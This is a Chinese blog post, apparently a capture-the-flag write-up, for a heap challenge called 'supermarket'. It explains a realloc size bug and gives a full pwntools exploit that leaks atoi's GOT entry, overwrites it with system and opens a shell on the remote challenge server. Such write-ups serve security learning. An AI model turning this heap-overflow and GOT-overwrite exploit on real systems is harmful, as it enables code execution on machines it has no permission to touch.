Loading... <!-- wp:paragraph --> <p>写在前面:这篇WP很简陋,我只写了重点</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>堆的利用我也开始一步步的开始“上道”了,这是一道比较简单的堆溢出,主要的难点是程序比较复杂,分析比较麻烦(毕竟我没经历过逆向的洗礼)。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>简单的来讲就是</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":838,"sizeSlug":"large","linkDestination":"none"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/12/QQ截图20201225230159.png" alt="" class="wp-image-838"/></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>这个改变说明的函数中进行了realloc重新分配空间却没有更新结构体储存size的变量,于是我们先申请一个较大的discreption在重新申请较小的,由于realloc在处理chunk变小时是直接切割,我们申请的下一个commodity的结构体会直接被分配到被切出来额chunk中,这样我们就可以实现任意地址读写。</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>#!/usr/bin/env python # coding=utf-8 from pwn import * #sh = process("./supermarket") sh = remote("220.249.52.134","46004") context(log_level = 'debug',arch = 'i386') elf = ELF("./supermarket") libc = ELF("./libc.so.6") def add(index,size,payload): sh.sendlineafter("your choice>> ",'1') sh.sendlineafter("name:",str(index)) sh.sendlineafter("price:","100") sh.sendlineafter("descrip_size:",str(size)) sh.sendlineafter("description:",payload) def delete(index): sh.sendlineafter("your choice>> ",'2') sh.sendlineafter("name:",str(index)) def list(): sh.sendlineafter("your choice>> ",'3') def ChangeDescript(index,size,payload): sh.sendlineafter("6. exit\nyour choice>> ",'5') sh.sendlineafter("name:",str(index)) sh.sendlineafter("descrip_size:",str(size)) sh.sendlineafter("description:",payload) add(0,0x100,'nothing') ChangeDescript(0,8,'nothing') add(1,0x40,'nothing') payload = 'a' * 8 + p32(16) + p32(0x40 + 0x8) + 'c' * 4 + 'c' * 16 + p32(0x40) + p32(elf.got["atoi"]) ChangeDescript(0,8,payload) list() sh.recvuntil("des.") sh.recvuntil("des.") atoi_addr = u32(sh.recv(4)) system_addr = atoi_addr - libc.symbols["atoi"] + libc.symbols["system"] print hex(system_addr) ChangeDescript('c' * 20 + '\x40',0x40,p32(system_addr)) sh.sendlineafter("your choice>> ",'/bin/sh') sh.interactive()</code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p><code>ChangeDescript('c' * 20 + '\x40',0x40,p32(system_addr))</code>中'c' * 20 + '\x40'这个奇怪的名字是因为我覆盖结构体的时候破坏了原来的名字变量,在调用list()过程的时候输出了这个名字出来,所以就是他了</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":840,"sizeSlug":"large","linkDestination":"none"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/12/QQ图片20201225231115.png" alt="" class="wp-image-840"/></figure></div> <!-- /wp:image --> 最后修改:2020 年 12 月 30 日 11 : 47 PM © 允许规范转载 赞赏 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧 ×Close 赞赏作者 扫一扫支付 支付宝支付 微信支付